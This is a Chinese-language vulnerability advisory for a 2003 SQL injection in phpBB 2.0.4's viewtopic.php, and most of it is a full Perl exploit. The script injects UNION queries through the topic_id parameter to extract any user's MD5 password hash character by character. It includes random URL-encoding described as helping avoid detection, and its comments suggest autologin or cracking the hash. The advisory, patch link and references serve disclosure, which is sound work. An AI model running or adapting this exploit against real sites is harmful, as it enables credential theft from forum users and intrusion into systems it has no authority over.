phpBB Viewtopic.PHP SQL注入漏洞发布时间:2003-06-19 更新时间:2003-06-20 严重程度:中 威胁程度:用户敏感信息泄露 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:7979 受影响系统 phpBB Group phpBB 2.0.4详细描述 phpBB是流行的论坛程序。 phpBB存在SQL注入漏洞, /viewtopic.php中的"topic_id"变量由GET中获得时没有充分过滤,可以导致用于获得用户的MD5密码。 测试代码 #!/usr/bin/perl -w # # # phpBB password disclosure vuln. # - rick patel (rikul7@yahoo.com) - # # There is a sql injection vuln which exists in /viewtopic.php file. The variable is \ $topic_id # which gets passed directly to sql server in query. Attacker could pass a \ special sql string which # can used to see md5 password hash for any user (!) for \ phpBB. This pass can be later used with # autologin or cracked using john. # # Details: # # this is checking done for $topic_id in viewtopic.php: # # if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) ) # { # $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]); # } # else if ( isset($HTTP_GET_VARS['topic']) ) # { # $topic_id = intval($HTTP_GET_VARS['topic']); # } # # ok... no else statement at end :) # now if GET[view]=newest and GET[sid] is set, this query gets executed: # # $sql = "SELECT p.post_id # FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . \ USERS_TABLE . " u # WHERE s.session_id = '$session_id' # AND u.user_id = s.session_user_id # AND p.topic_id = $topic_id # AND p.post_time >= u.user_lastvisit # ORDER BY p.post_time ASC # LIMIT 1"; # # Ahh! $topic_id gets passed directy to query. So how can we use this to do something \ important? Well # I decided to use union and create a second query will get us \ something useful. There were couple of # problems i ran into. first, phpBB only \ cares about the first row returned. second, the select for first # query is p.post_id \ which is int, so int becomes the type returned for any other query in union. third, \ # there is rest of junk at end " AND p.post_time >= ..." We tell mysql to ignore that \ by placing /* at end # of our injected query. So what query can we make that returns \ only int? # this one => select ord(substring(user_password,$index,1)) from \ phpbb_users where user_id = $uid # Then all we have to do is query 32 times which \ $index from 1-32 and we get ord value of all chars of # md5 hash password. # # I have only tested this with mysql 4 and pgsql . Mysql 3.x does not support \ unions so you would have to tweak # the query to do anything useful. # # This script is for educational purpose only. Please dont use it to do anything \ else. # use IO::Socket; $remote = shift || 'localhost'; $view_topic = shift || '/phpBB2/viewtopic.php'; $uid = shift || 2; $port = 80; $dbtype = 'mysql4'; # mysql4 or pgsql print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n"; $p = ""; for($index=1; $index<=32; $index++) { $socket = IO::Socket::INET->new(PeerAddr => $remote, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldnt connect to $remote:$port : $@\n"; $str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . \ "&view=newest" . " HTTP/1.0\n\n"; print $socket $str; print $socket "Cookie: phpBB2mysql_sid=1\n"; # replace this for pgsql or remove it print $socket "Host: $remote\n\n"; while ($answer = <$socket>) { if ($answer =~ /Location:.*\x23(\d+)/) # Matches the Location: \ viewtopic.php?p=<num>#<num> { $p .= chr ($1); } } close($socket); } print "\nMD5 Hash for uid $uid is $p\n"; # random encode str. helps avoid detection sub random_encode { $str = shift; $ret = ""; for($i=0; $i<length($str); $i++) { $c = substr($str,$i,1); $j = rand length($str) * 1000; if (int($j) % 2 || $c eq ' ') { $ret .= "%" . sprintf("%x",ord($c)); } else { $ret .= $c; } } return $ret; } sub make_dbsql { if ($dbtype eq 'mysql4') { return " union select ord(substring(user_password," . $index . ",1)) from \ phpbb_users where user_id=$uid/*" ; } elsif ($dbtype eq 'pgsql') { return "; select ascii(substring(user_password from $index for 1)) as post_id from \ phpbb_posts p, phpbb_users u where u.user_id=$uid or false"; } else { return ""; } } 解决方案 临时补丁可以按照如下方法修补: http://www.phpbb.com/phpBB/viewtopic.php?t=112052 相关信息 Rick <rikul@bellsouth.net>. 参考:http://marc.theaimsgroup.com/?l=bugtraq&m=105607263130644&w=2 |
